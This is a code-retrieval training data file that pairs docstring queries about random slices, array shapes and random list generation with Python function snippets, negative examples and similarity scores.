[ "0.71436214", "0.6230163", "0.54177374", "0.53693205", "0.526794", "0.52386534", "0.5171279", "0.5169592", "0.5149605", "0.5122925", "0.5052315", "0.50437593", "0.5038537", "0.5037338", "0.5033946", "0.49886644", "0.49637598", "0.49573925", "0.495004", "0.49486208", "0.49379534", "0.49083477", "0.490449", "0.49014556", "0.48968804", "0.48890892", "0.48780963", "0.4869522", "0.48581892", "0.48539877" ]
0.7153341
0
Create a random slice of len slicelen that fits into listlen.
def randslice_from_slicelen(slicelen, listlen): maxstart = listlen - slicelen start = randrange(maxstart+1) maxstep = (listlen - start) // slicelen if slicelen else 1 step = randrange(1, maxstep+1) stop = start + slicelen * step s = slice(start, stop, step) _, _, _, control = slice_indices(s, listlen) if control != slicelen: raise RuntimeError return s
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def randslice_from_slicelen(slicelen, listlen):\n maxstart = listlen - slicelen\n start = randrange(maxstart + 1)\n maxstep = (listlen - start) // slicelen if slicelen else 1\n step = randrange(1, maxstep + 1)\n stop = start + slicelen * step\n s = slice(start, stop, step)\n _, _, _, control = slice_indices(s, listlen)\n if control != slicelen:\n raise RuntimeError\n return s", "def random_slice(l: list, size: int) -> list:\n first = randint(0, len(l) - size)\n return l[first:first+size]", "def rslice(n, allow_empty=False):\n minlen = 0 if allow_empty or n == 0 else 1\n slicelen = randrange(minlen, n + 1)\n return randslice_from_slicelen(slicelen, n)", "def rslice(n, allow_empty=False):\n minlen = 0 if allow_empty or n == 0 else 1\n slicelen = randrange(minlen, n+1)\n return randslice_from_slicelen(slicelen, n)", "def selectRandomSubListFromListWithRepl(ldata, num):\n\treturn list(map(lambda i : selectRandomFromList(ldata), range(num)))", "def generate_list(length: int) -> list:\n\n return [randint(0, length + 1) for _ in range(length)]", "def generate_list(size):\n items = [randint(0, MAX_NUM) for i in range(size)]\n return items", "def random_subsequence(seq, length, min_stride=1, max_stride=1):\n # First pick a stride.\n if max_stride == min_stride:\n stride = min_stride\n else:\n stride = np.random.randint(min_stride, max_stride+1)\n\n # Now pick the starting index.\n # If the subsequence starts at index i, then its final element will be at\n # index i + (length - 1) * stride, which must be less than the length of\n # the sequence. Therefore i must be less than maxval, where:\n maxval = len(seq) - (length - 1) * stride\n start = np.random.randint(0, maxval)\n end = start + 1 + (length - 1) * stride\n return seq[start:end:stride]", "def selectRandomFromList(ldata):\n\treturn ldata[randint(0, len(ldata)-1)]", "def generate_equal_slices(list_to_slice, batch_size):\n\n assert len(list_to_slice) > 1\n\n list_slices = []\n\n sample_size = len(list_to_slice)\n\n for start_i in range(0, sample_size, batch_size):\n end_i = start_i + batch_size\n aslice = list_to_slice[start_i:end_i]\n if len(aslice) < batch_size:\n aslice_rep = aslice * math.ceil(batch_size/len(aslice))\n aslice = aslice_rep[:batch_size]\n\n assert len(aslice) == batch_size\n\n list_slices.append(aslice)\n\n return list_slices", "def selectRandomSubListFromList(ldata, num):\n\tassertLesser(num, len(ldata), \"size of sublist to be sampled greater than or equal to main list\")\n\ti = randint(0, len(ldata)-1)\n\tsel = ldata[i]\n\tselSet = {i}\n\tselList = [sel]\n\twhile (len(selSet) < num):\n\t\ti = randint(0, len(ldata)-1)\n\t\tif (i not in selSet):\n\t\t\tsel = ldata[i]\n\t\t\tselSet.add(i)\n\t\t\tselList.append(sel)\t\t\n\treturn selList", "def getRandomFromList(self, l):\n if (len(l) == 0):\n return -1\n return l[randint(0, len(l) - 1)]", "def random_subset(array, count):\n indices = np.random.permutation(len(array))[:count]\n return array[indices]", "def populate_array_random(arr_length):\n arr = []\n for i in range(int(arr_length)):\n arr.append(random.randint(-100000, 100000))\n return arr", "def get_unsorted_list(size,MaxN=1000,MinN=0):\n return [random.randint(MinN,MaxN) for i in xrange(size)]", "def get_slice_from_list(self,list_,start=0,end=None):\r\n start = self._index_to_int(start,True)\r\n if end is not None:\r\n end= self._index_to_int(end)\r\n\r\n return list_[start:end]", "def some_simple_data(length=1000000):\n data = list(range(length))\n random.shuffle(data)\n return data", "def rand_list(n, limit):\n g = []\n while n > 0:\n g.append(random.randrange(limit))\n n -= 1\n return g", "def getRandomList(n):\n lyst = list()\n for count in range (n):\n lyst.append(random.randint(1, n))\n return lyst", "def rand_bytes_range(minlen, maxlen):\n return rand_bytes(random.randint(minlen, maxlen))", "def crop(array, length, deterministic=False):\n if len(array) > length:\n if not deterministic:\n pos = np.random.randint(len(array) - length + 1)\n array = array[pos:pos + length:]\n else:\n l = len(array)\n array = array[(l - length) // 2:(l + length) // 2]\n return array", "def generateRandomList(minval, maxval, size):\n return [random.randint(minval, maxval) for _ in range(size)]", "def individual(length, min, max):\r\n return [ randint(min, max) for x in range(length) ]", "def slice(data, size):\n\treturn dice(data, size).T", "def create_list(self):\n\n\t\trandom_list = random.sample(range(0, 500), 10)\n\n\t\treturn random_list", "def shuffle_slice(a, start, stop):\n i = start\n while (i < stop-1):\n idx = random.randrange(i, stop)\n a[i], a[idx] = a[idx], a[i]\n i += 1", "def populate_empty_list():\n\n from random import randint, seed\n seed(56)\n l = []\n for i in range(100):\n l.append(randint(0, 100))\n print(l[34:56])", "def _rand_subset(self, iterable, num_elems):\n\n lst = list(iterable)\n assert num_elems <= len(lst)\n\n out = []\n\n while len(out) < num_elems:\n elem = self._rand_elem(lst)\n lst.remove(elem)\n out.append(elem)\n\n return out", "def slice_list(list_to_slice, *upper_bounds):\n list_to_return=[]\n for upper_bound in upper_bounds:\n if (len(list_to_slice)>upper_bound):\n print('Slicing...')\n list_to_return.append(list_to_slice[:upper_bound])\n else:\n list_to_return.append(None)\n \n return list_to_return", "def partial_shuffle(l, start, end):\n l[start:end] = sorted(l[start:end], key=lambda x: random.random())\n return l" ]
[ "0.83833927", "0.80226773", "0.714893", "0.7132235", "0.6567857", "0.6413113", "0.62118304", "0.61636114", "0.6134608", "0.6101278", "0.61010647", "0.6062314", "0.60282576", "0.6016087", "0.59929234", "0.5939068", "0.59296066", "0.59249735", "0.59247345", "0.5907804", "0.5882826", "0.5880306", "0.5863617", "0.58498406", "0.5843864", "0.5826133", "0.5813354", "0.58061206", "0.5777072", "0.57761395" ]
0.8387383
0
Create two sets of slices for an array x with shape 'shape' such that shapeof(x[lslices]) == shapeof(x[rslices]).
def randslice_from_shape(ndim, shape): lslices = [0] * ndim rslices = [0] * ndim for n in range(ndim): l = shape[n] slicelen = randrange(1, l+1) if l > 0 else 0 lslices[n] = randslice_from_slicelen(slicelen, l) rslices[n] = randslice_from_slicelen(slicelen, l) return tuple(lslices), tuple(rslices)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def randslice_from_shape(ndim, shape):\n lslices = [0] * ndim\n rslices = [0] * ndim\n for n in range(ndim):\n l = shape[n]\n slicelen = randrange(1, l + 1) if l > 0 else 0\n lslices[n] = randslice_from_slicelen(slicelen, l)\n rslices[n] = randslice_from_slicelen(slicelen, l)\n return tuple(lslices), tuple(rslices)", "def rslices_ndim(ndim, shape, iterations=5):\n for _ in range(iterations):\n yield tuple(rslice(shape[n]) for n in range(ndim))\n for _ in range(iterations):\n yield tuple(rslice(shape[n], allow_empty=True) for n in range(ndim))\n yield tuple(slice(0, 1, 0) for _ in range(ndim))", "def genslices_ndim(ndim, shape):\n iterables = [genslices(shape[n]) for n in range(ndim)]\n return product(*iterables)", "def genslices_ndim(ndim, shape):\n iterables = [genslices(shape[n]) for n in range(ndim)]\n return product(*iterables)", "def rslices_ndim(ndim, shape, iterations=5):\n # non-empty slices\n for _ in range(iterations):\n yield tuple(rslice(shape[n]) for n in range(ndim))\n # possibly empty slices\n for _ in range(iterations):\n yield tuple(rslice(shape[n], allow_empty=True) for n in range(ndim))\n # invalid slices\n yield tuple(slice(0,1,0) for _ in range(ndim))", "def rand_aligned_slices(maxdim=5, maxshape=16):\n ndim = randrange(1, maxdim+1)\n minshape = 2\n n = randrange(100)\n if n >= 95:\n minshape = 0\n elif n >= 90:\n minshape = 1\n all_random = True if randrange(100) >= 80 else False\n lshape = [0]*ndim; rshape = [0]*ndim\n lslices = [0]*ndim; rslices = [0]*ndim\n\n for n in range(ndim):\n small = randrange(minshape, maxshape+1)\n big = randrange(minshape, maxshape+1)\n if big < small:\n big, small = small, big\n\n # Create a slice that fits the smaller value.\n if all_random:\n start = randrange(-small, small+1)\n stop = randrange(-small, small+1)\n step = (1,-1)[randrange(2)] * randrange(1, small+2)\n s_small = slice(start, stop, step)\n _, _, _, slicelen = slice_indices(s_small, small)\n else:\n slicelen = randrange(1, small+1) if small > 0 else 0\n s_small = randslice_from_slicelen(slicelen, small)\n\n # Create a slice of the same length for the bigger value.\n s_big = randslice_from_slicelen(slicelen, big)\n if randrange(2) == 0:\n rshape[n], lshape[n] = big, small\n rslices[n], lslices[n] = s_big, s_small\n else:\n rshape[n], lshape[n] = small, big\n rslices[n], lslices[n] = s_small, s_big\n\n return lshape, rshape, tuple(lslices), tuple(rslices)", "def _build_slices(dataset, patch_shape, stride_shape):\n slices = []\n if dataset.ndim == 4:\n in_channels, i_z, i_y, i_x = dataset.shape\n else:\n i_z, i_y, i_x = dataset.shape\n\n k_z, k_y, k_x = patch_shape\n s_z, s_y, s_x = stride_shape\n z_steps = SliceBuilder._gen_indices(i_z, k_z, s_z)\n for z in z_steps:\n y_steps = SliceBuilder._gen_indices(i_y, k_y, s_y)\n for y in y_steps:\n x_steps = SliceBuilder._gen_indices(i_x, k_x, s_x)\n for x in x_steps:\n slice_idx = (\n slice(z, z + k_z),\n slice(y, y + k_y),\n slice(x, x + k_x)\n )\n if dataset.ndim == 4:\n slice_idx = (slice(0, in_channels),) + slice_idx\n slices.append(slice_idx)\n return slices", "def test_slice_other_dimension(setup_teardown_file):\n f = setup_teardown_file[3]\n\n for i, shape in enumerate([(3, 0), (1, 2, 0), (2, 0, 1)]):\n dset = f.create_dataset('x%d'%i, shape, dtype=np.int32)\n assert dset.shape == shape\n out = dset[:1]\n assert isinstance(out, np.ndarray)\n assert out.shape == (1,)+shape[1:]", "def make_fwd_slice(shape, slices, reverse=None, cull_second=True):\n if reverse is None:\n reverse = []\n if not isinstance(shape, (list, tuple, np.ndarray)):\n shape = [shape]\n if not isinstance(slices, (list, tuple)):\n slices = [slices]\n if not isinstance(reverse, (list, tuple)):\n reverse = [reverse]\n\n newax_inds = [i for i, x in enumerate(slices) if x == np.newaxis]\n shape = list(shape)\n for i in newax_inds:\n shape.insert(i, 1)\n\n # ya know, lets just go through all the dimensions in shape\n # just to be safe and default to an empty slice / no reverse\n slices = slices + [slice(None)] * (len(shape) - len(slices))\n reverse = reverse + [False] * (len(slices) - len(reverse))\n\n first_slc = [slice(None)] * len(slices)\n second_slc = [slice(None, None, 1)] * len(first_slc)\n\n for i, slc, L, rev in izip(count(), slices, shape, reverse):\n if isinstance(slc, slice):\n step = slc.step if slc.step is not None else 1\n start = slc.start if slc.start is not None else 0\n stop = slc.stop if slc.stop is not None else L\n if start < 0:\n start += L\n if stop < 0:\n stop += L\n\n # sanity check the start/stop since we're gunna be playing\n # fast and loose with them\n if start < 0 or stop < 0:\n raise IndexError(\"((start = {0}) or (stop = {1})) < 0\"\n \"\".format(start, stop))\n if start > L or stop > L:\n raise IndexError(\"((start={0}) or (stop={1})) > (L={2})\"\n \"\".format(start, stop, L))\n\n # now do the math of flipping the slice if needed, these branches\n # change start, stop, and step so they can be used to create a new\n # slice below\n if rev:\n if step < 0:\n step = -step\n if slc.start is None:\n start = L - 1\n if slc.stop is None:\n start = L - 1 - start\n stop = None\n else:\n start, stop = L - 1 - start, L - 1 - stop\n else:\n start, stop = L - stop, L - start\n start += ((stop - 1 - start) % step)\n second_slc[i] = slice(None, None, -1)\n elif step < 0:\n step = -step\n if slc.start is None:\n start = L - 1\n\n if slc.stop is None:\n start, stop = 0, start + 1\n start = ((stop - 1 - start) % step)\n else:\n start, stop = stop + 1, start + 1\n start += ((stop - 1 - start) % step)\n\n second_slc[i] = slice(None, None, -1)\n\n # check that our slice is valid\n assert start is None or (0 <= start and start <= L), \\\n \"start (={0}) is outside range\".format(start)\n assert start is None or (0 <= start and start <= L), \\\n \"start (={0}) is outside range\".format(start)\n assert start is None or stop is None or start < stop, \\\n \"bad slice ordering: {0} !< {1}\".format(start, stop)\n assert step > 0\n slc = slice(start, stop, step)\n\n elif isinstance(slc, (int, np.integer)):\n second_slc[i] = None\n if rev:\n slc = (L - 1) - slc\n\n elif slc == np.newaxis:\n second_slc[i] = \"NEWAXIS\"\n\n first_slc[i] = slc\n\n first_slc = [s for s in first_slc if s is not np.newaxis]\n if cull_second:\n second_slc = [s for s in second_slc if s is not None]\n second_slc = [np.newaxis if s == \"NEWAXIS\" else s for s in second_slc]\n return first_slc, second_slc", "def genslices_ndim(ndim, shape):\n iterables = [genslices(shape[n]) for n in range(ndim)]\n yield from product(*iterables)", "def rand_aligned_slices(maxdim=5, maxshape=16):\n ndim = randrange(1, maxdim + 1)\n minshape = 2\n n = randrange(100)\n if n >= 95:\n minshape = 0\n elif n >= 90:\n minshape = 1\n all_random = True if randrange(100) >= 80 else False\n lshape = [0] * ndim\n rshape = [0] * ndim\n lslices = [0] * ndim\n rslices = [0] * ndim\n for n in range(ndim):\n small = randrange(minshape, maxshape + 1)\n big = randrange(minshape, maxshape + 1)\n if big < small:\n big, small = small, big\n if all_random:\n start = randrange(-small, small + 1)\n stop = randrange(-small, small + 1)\n step = (1, -1)[randrange(2)] * randrange(1, small + 2)\n s_small = slice(start, stop, step)\n _, _, _, slicelen = slice_indices(s_small, small)\n else:\n slicelen = randrange(1, small + 1) if small > 0 else 0\n s_small = randslice_from_slicelen(slicelen, small)\n s_big = randslice_from_slicelen(slicelen, big)\n if randrange(2) == 0:\n rshape[n], lshape[n] = big, small\n rslices[n], lslices[n] = s_big, s_small\n else:\n rshape[n], lshape[n] = small, big\n rslices[n], lslices[n] = s_small, s_big\n return lshape, rshape, tuple(lslices), tuple(rslices)", "def same_nd(shape, stride, kernel_size):\n\n rshape = []\n for sh, st, sz in zip(shape, stride, kernel_size):\n rshape.append(int(same_x(sh, st, sz)))\n return rshape", "def slice_output_shape(input_shape):\n shape_1 = input_shape[0]\n shape_2 = 80\n shape_3 = input_shape[2]\n return (shape_1, shape_2, shape_3)", "def test_slice_other_dimension(self):\n for i, shape in enumerate([(3, 0), (1, 2, 0), (2, 0, 1)]):\n dset = self.f.create_dataset('x%d'%i, shape, dtype=int, maxshape=(None,)*len(shape))\n self.assertEqual(dset.shape, shape)\n out = dset[:1]\n self.assertIsInstance(out, np.ndarray)\n self.assertEqual(out.shape, (1,)+shape[1:])", "def get_slicing_crops(pred_shape, target_shape, pred_ds_factor, real_patch_shape):\n # Compute new left crops:\n # (we do not care about the right crops, because anyway the extra patches are\n # ignored with the option `limit_patches_to`)\n upscaled_pred_shape = [sh * fctr for sh, fctr in zip(pred_shape, pred_ds_factor)]\n\n shape_diff = [orig - trg for orig, trg in zip(target_shape, upscaled_pred_shape)]\n assert all([diff >= 0 for diff in shape_diff]), \"Prediction should be smaller or equal to the targets!\"\n assert all([diff % 2 == 0 for diff in shape_diff])\n padding = [int(diff / 2) for diff in shape_diff]\n\n crop_slice_targets = [slice(None), slice(None)]\n crop_slice_prediction = [slice(None), slice(None)]\n import math\n for dim, pad in enumerate(padding):\n # Consider the patch-padding:\n real_pad = pad - int(real_patch_shape[dim] / 2)\n if real_pad > 0:\n # We should crop targets\n crop_slice_targets.append(slice(real_pad, -real_pad))\n crop_slice_prediction.append(slice(None))\n elif real_pad < 0:\n # We should crop prediction:\n # (use floor to round up, since pad is negative)\n crop_slice_prediction.append(\n slice(-math.floor(real_pad / pred_ds_factor[dim]), math.floor(real_pad / pred_ds_factor[dim])))\n crop_slice_targets.append(slice(None))\n else:\n # No need to crop:\n crop_slice_targets.append(slice(None))\n crop_slice_prediction.append(slice(None))\n\n return tuple(crop_slice_targets), tuple(crop_slice_prediction)", "def _get_slice(segments, shape):\n\n if not (1 <= len(shape) <= 2):\n raise ValueError('Cannot segment array of shape: %s' % str(shape))\n else:\n size = shape[0]\n slice_length = np.ceil(float(size) / segments)\n start_idx = 0\n end_idx = slice_length\n while start_idx < size:\n if len(shape) == 1:\n yield slice(start_idx, end_idx)\n else:\n yield (slice(start_idx, end_idx), slice(None))\n start_idx = end_idx\n end_idx = min(start_idx + slice_length, size)", "def match_shapes(arrs):\n #temp = [(name, np.asarray(a), deg) for name, a, deg in arrs]\n #ndim = max([a.ndim - deg for _, a, deg in arrs])\n\n temp = [a for name, a, deg in arrs]\n for i in range(len(temp)):\n if np.isscalar(temp[i]):\n temp[i] = np.array(temp[i])\n ndim = max([a.ndim - deg for a, (_, _, deg) in zip(temp, arrs)])\n\n prep_arrs = []\n for name, a, deg in arrs:\n if np.isscalar(a):\n a = np.asarray(a)\n if a.ndim < deg:\n raise RuntimeError('%s.ndim must be at least %d' % (name, deg))\n if a.ndim < ndim + deg:\n #a = a.reshape((1,) * (ndim + deg - a.ndim) + a.shape)\n slc = (nax,) * (ndim + deg - a.ndim) + (Ellipsis,)\n a = a[slc]\n prep_arrs.append(a)\n\n return prep_arrs", "def convolve_slicer(arr, shape1, shape2, mode, axis):\n\n m, n = shape1[axis], shape2[axis]\n p, q = max(m,n), min(m,n)\n\n if mode == 'full':\n\n # full mode length is m + n - 1\n return arr\n \n if mode == 'same':\n \n # same mode length is max(m, n) centered along axis of arr\n start = (q - 1) // 2\n stop = start + p\n return slice_along_axis(arr, start, stop, axis=axis)\n\n elif mode == 'valid':\n \n # valid mode length is m + n - 1 - 2 * (q-1) centered along axis\n start= q - 1 \n stop = (n + m - 1) - (q - 1)\n return slice_along_axis(arr, start, stop, axis=axis)", "def test_slice_zero_length_dimension(setup_teardown_file):\n f = setup_teardown_file[3]\n\n for i, shape in enumerate([(0,), (0, 3), (0, 2, 1)]):\n dset = f.create_dataset('x%d'%i, shape, dtype=np.int32)\n assert dset.shape == shape\n out = dset[...]\n assert isinstance(out, np.ndarray)\n assert out.shape == shape\n out = dset[:]\n assert isinstance(out, np.ndarray)\n assert out.shape == shape\n if len(shape) > 1:\n out = dset[:, :1]\n assert isinstance(out, np.ndarray)\n assert out.shape[:2] == (0, 1)", "def split_combined_polys(polys, poly_lens, polys_per_mask):\n mask_polys_list = []\n for img_id in range(len(polys)):\n polys_single = polys[img_id]\n polys_lens_single = poly_lens[img_id].tolist()\n polys_per_mask_single = polys_per_mask[img_id].tolist()\n\n split_polys = mmcv.slice_list(polys_single, polys_lens_single)\n mask_polys = mmcv.slice_list(split_polys, polys_per_mask_single)\n mask_polys_list.append(mask_polys)\n return mask_polys_list", "def reshape(x, shape):\n return Reshape(shape)(x)", "def test_slice_zero_length_dimension(self):\n for i, shape in enumerate([(0,), (0, 3), (0, 2, 1)]):\n dset = self.f.create_dataset('x%d'%i, shape, dtype=int, maxshape=(None,)*len(shape))\n self.assertEqual(dset.shape, shape)\n out = dset[...]\n self.assertIsInstance(out, np.ndarray)\n self.assertEqual(out.shape, shape)\n out = dset[:]\n self.assertIsInstance(out, np.ndarray)\n self.assertEqual(out.shape, shape)\n if len(shape) > 1:\n out = dset[:, :1]\n self.assertIsInstance(out, np.ndarray)\n self.assertEqual(out.shape[:2], (0, 1))", "def gen_split(shape,left=True):\n # Create the splitting tensor\n if left:\n split_shape = (np.prod(shape),)+shape\n else:\n split_shape = shape+(np.prod(shape),)\n split_ten = np.zeros(split_shape)\n # Turn into correct identity\n allinds = [range(i) for i in shape]\n cnt = 0\n for ind in itertools.product(*allinds):\n if left:\n tenind = (cnt,)+tuple(ind)\n else:\n tenind = tuple(ind)+(cnt,)\n split_ten[tenind] = 1.\n cnt += 1\n # Return result\n return split_ten", "def _compute_slice_dim_and_shape(full_shape, slicing):\n\n slice_shape = [0] * len(full_shape)\n slice_dim = None\n for dim, num_slices in enumerate(slicing):\n dim_size = full_shape[dim]\n if num_slices <= 0 or dim_size < num_slices:\n raise ValueError(\"Cannot create %d slices for size %d. shape: %s, \"\n \"slicing: %s\" %\n (num_slices, full_shape[dim], full_shape, slicing))\n if num_slices == 1:\n # Not slicing in this dimension.\n slice_shape[dim] = dim_size\n elif slice_dim is not None:\n # We only support slicing along one of the dimensions.\n raise ValueError(\"Can only slice a variable along one dimension: \"\n \"shape: %s, slicing: %s\" % (full_shape, slicing))\n else:\n # Note: We will add any extras onto the last slice, later.\n slice_dim = dim\n slice_shape[dim] = dim_size // num_slices\n\n # Degenerate case: If \"slicing\" was all ones, pretend we are slicing along\n # the first dimension.\n if slice_dim is None:\n slice_dim = 0\n return slice_dim, slice_shape", "def overlaps(self, indices):\n p_indices = []\n shape = []\n\n if not indices:\n return p_indices, shape\n\n for index, (r0, r1), size in zip(indices, self.location, self.shape):\n if isinstance(index, slice):\n stop = size\n if index.stop < r1:\n stop -= r1 - index.stop\n\n start = index.start - r0\n if start < 0:\n start %= index.step # start is now +ve\n\n if start >= stop:\n # This partition does not span the slice\n return None, None\n\n # Still here?\n step = index.step\n index = slice(start, stop, step)\n index_size, rem = divmod(stop - start, step)\n if rem:\n index_size += 1\n\n else:\n\n # Still here?\n index = [i - r0 for i in index if r0 <= i < r1]\n index_size = len(index)\n if index_size == 0:\n return None, None\n elif index_size == 1:\n index = slice(index[0], index[0] + 1)\n else:\n index0 = index[0]\n step = index[1] - index0\n if step > 0:\n start, stop = index0, index[-1] + 1\n elif step < 0:\n start, stop = index0, index[-1] - 1\n if index == list(range(start, stop, step)):\n # Replace the list with a slice object\n if stop < 0:\n stop = None\n index = slice(start, stop, step)\n # --- End: if\n\n p_indices.append(index)\n shape.append(index_size)\n # --- End: for\n\n # Still here? Then this partition does span the slice and the\n # elements of this partition specified by p_indices are in the\n # slice.\n return p_indices, shape", "def intersect_slices(s1, s2, array_length=None):\n\n assert array_length is not None or \\\n (s1.start >= 0 and s2.start >= 0 and s1.stop >= 0 and s2.start >= 0)\n\n s1_start = s1.start\n s2_start = s2.start\n s1_stop = s1.stop\n s2_stop = s2.stop\n s1_step = s1.step\n s2_step = s2.step\n\n if s1_step is None:\n s1_step = 1\n if s2_step is None:\n s2_step = 1\n\n assert s1_step > 0 and s2_step > 0\n\n if s1_start < 0:\n s1_start = array_length + s1_start\n if s1_start < 0:\n return slice(0, 0)\n\n if s2_start < 0:\n s2_start = array_length + s2_start\n if s2_start < 0:\n return slice(0, 0)\n\n if s1_stop < 0:\n s1_stop = array_length + s1_stop\n if s1_stop < 0:\n return slice(0, 0)\n\n if s2_stop < 0:\n s2_stop = array_length + s2_stop\n if s2_stop < 0:\n return slice(0, 0)\n\n step = lcm(s1_step, s2_step)\n\n start = max(s1_start, s2_start)\n stop = min(s1_stop, s2_stop)\n\n if stop <= start:\n return slice(0, 0)\n\n s1_offset = start - s1_start\n s2_offset = start - s2_start\n s1_offset_x = int(s1_offset)\n s2_offset_x = int(s2_offset)\n\n if s1_step == s2_step and s1_offset % s1_step != s2_offset % s1_step:\n # slices are mutually exclusive\n return slice(0, 0)\n\n # There is surely a more efficient way to do the following, but\n # it eludes me for the moment\n while s1_offset % s1_step != 0 or s2_offset % s2_step != 0:\n start += 1\n s1_offset += 1\n s2_offset += 1\n if s1_offset % s1_step == s1_offset_x % s1_step and s2_offset % s2_step == s2_offset_x % s2_step:\n # slices are mutually exclusive\n return slice(0, 0)\n\n if step == 1:\n step = None\n\n return slice(start, stop, step)", "def random_split(dataset, lengths):\n if sum(lengths) != len(dataset):\n raise ValueError(\"Sum of input lengths does not equal the length of the input dataset!\")\n\n indices = randperm(sum(lengths))\n return [Subset(dataset, indices[offset - length:offset]) for offset, length in zip(_accumulate(lengths), lengths)]", "def generate_equal_slices(list_to_slice, batch_size):\n\n assert len(list_to_slice) > 1\n\n list_slices = []\n\n sample_size = len(list_to_slice)\n\n for start_i in range(0, sample_size, batch_size):\n end_i = start_i + batch_size\n aslice = list_to_slice[start_i:end_i]\n if len(aslice) < batch_size:\n aslice_rep = aslice * math.ceil(batch_size/len(aslice))\n aslice = aslice_rep[:batch_size]\n\n assert len(aslice) == batch_size\n\n list_slices.append(aslice)\n\n return list_slices", "def merge_slices(s1, s2):\n assert s1._shape[1] == s2._shape[1], \"\"\"The arrays must have the same\n number of columns.\"\"\"\n assert s1._sparse == s2._sparse, \"\"\"A sparse and a dense array cannot\n be merged.\"\"\"\n assert s1._reg_shape == s2._reg_shape, \"\"\"The array regular blocks must\n have the same shape.\"\"\"\n\n len_s1 = s1.shape[0]\n len_s2 = s2.shape[0]\n\n # If s1 or s2 is empty, quickly return the other slice.\n if len_s1 == 0:\n return s2\n if len_s2 == 0:\n return s1\n\n reg_shape = s1._reg_shape\n reg_rows = reg_shape[0]\n\n # Compute the start and end of regular row blocks for s1\n top_rows_s1 = s1._top_left_shape[0]\n reg_rows_start_s1 = top_rows_s1 if top_rows_s1 != reg_rows else 0\n reg_rows_end_s1 = len_s1 - (len_s1 - reg_rows_start_s1) % reg_rows\n\n # Compute the start and end of regular row blocks for s2\n top_rows_s2 = s2._top_left_shape[0]\n reg_rows_start_s2 = top_rows_s2 if top_rows_s2 != reg_rows else 0\n reg_rows_end_s2 = len_s2 - (len_s2 - reg_rows_start_s2) % reg_rows\n\n # Get arrays with the regular row blocks for s1 and s2\n reg_s1 = s1[reg_rows_start_s1:reg_rows_end_s1]\n reg_s2 = s2[reg_rows_start_s2:reg_rows_end_s2]\n\n # Add the regular row blocks to the list all_blocks\n all_blocks = []\n if reg_s1.shape[0]:\n all_blocks.extend(reg_s1._blocks)\n if reg_s2.shape[0]:\n all_blocks.extend(reg_s2._blocks)\n\n # If there are remaining rows on the top or bottom of s1 and s2, add them\n # to the list extras. These are row blocks with less than reg_rows.\n extras = []\n if reg_rows_start_s1 > 0:\n extras.append(s1[:reg_rows_start_s1])\n if reg_rows_start_s2 > 0:\n extras.append(s1[:reg_rows_start_s2])\n if reg_rows_end_s1 < len_s1:\n extras.append(s1[reg_rows_end_s1:])\n if reg_rows_end_s2 < len_s2:\n extras.append(s2[reg_rows_end_s2:])\n\n # Arrange the rows of the arrays in extras in groups of reg_rows rows,\n # slicing the arrays when necessary. The last group may have less than\n # reg_rows rows.\n groups = []\n current_capacity = 0\n for extra in extras:\n len_extra = extra.shape[0]\n if current_capacity == 0:\n current_capacity = reg_rows\n groups.append([])\n if extra.shape[0] <= current_capacity:\n current_capacity -= extra.shape[0]\n groups[-1].append(extra)\n else:\n groups[-1].append(extra[:current_capacity])\n groups.append([extra[current_capacity:]])\n current_capacity = current_capacity - len_extra + reg_rows\n\n # Merge the row blocks in each group, forming a single row block per group,\n # and add it to the list all blocks.\n for g in groups:\n blocks = []\n for a in g:\n for row_block in a._blocks:\n blocks.append(row_block)\n group_blocks = [object() for _ in range(s1._n_blocks[1])]\n _merge_rows_keeping_cols(blocks, group_blocks)\n all_blocks.append(group_blocks)\n\n # Now all_blocks contains all the rows of s1 and s2 in an appropiate\n # arrangement to create the merged array.\n return Array(blocks=all_blocks, top_left_shape=reg_shape,\n reg_shape=reg_shape, shape=(len_s1 + len_s2, s1.shape[1]),\n sparse=s1._sparse)", "def get_shapes(imshp=(1, 1), kshp=(1, 1), subsample=(1, 1),\r\n img_stride=(1, 1), kern_stride=(1, 1)):\r\n return [\r\n #stack only\r\n ((1, 2) + imshp, (1, 2) + kshp, subsample, img_stride, kern_stride),\r\n #batch only\r\n ((3, 1) + imshp, (1, 1) + kshp, subsample, img_stride, kern_stride),\r\n #nkern only\r\n ((1, 1) + imshp, (2, 1) + kshp, subsample, img_stride, kern_stride),\r\n #batch and nkern\r\n ((3, 1) + imshp, (2, 1) + kshp, subsample, img_stride, kern_stride),\r\n #batch and stack\r\n ((3, 2) + imshp, (1, 2) + kshp, subsample, img_stride, kern_stride),\r\n #stack and nkern\r\n ((1, 2) + imshp, (2, 2) + kshp, subsample, img_stride, kern_stride),\r\n #batch, nkern and stack\r\n ((2, 2) + imshp, (2, 2) + kshp, subsample, img_stride, kern_stride),\r\n #batch, nkern and stack\r\n ((3, 2) + imshp, (4, 2) + kshp, subsample, img_stride, kern_stride)\r\n ]" ]
[ "0.6905628", "0.65749097", "0.6485385", "0.6485385", "0.6428866", "0.64170295", "0.64149487", "0.6344559", "0.6343766", "0.6329222", "0.62940896", "0.6255896", "0.62288624", "0.6182799", "0.59876955", "0.5903534", "0.58359647", "0.5818925", "0.5786385", "0.5780439", "0.5728248", "0.5711932", "0.5707022", "0.56921947", "0.5662671", "0.5659566", "0.5657923", "0.5649833", "0.5634276", "0.5630171" ]
0.6896135
1
Return a list of random items for structure 't' with format 'fmtchar'.
def randitems_from_structure(fmt, t): memlen, itemsize, _, _, _, _ = t return gen_items(memlen//itemsize, '#'+fmt, 'numpy')
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
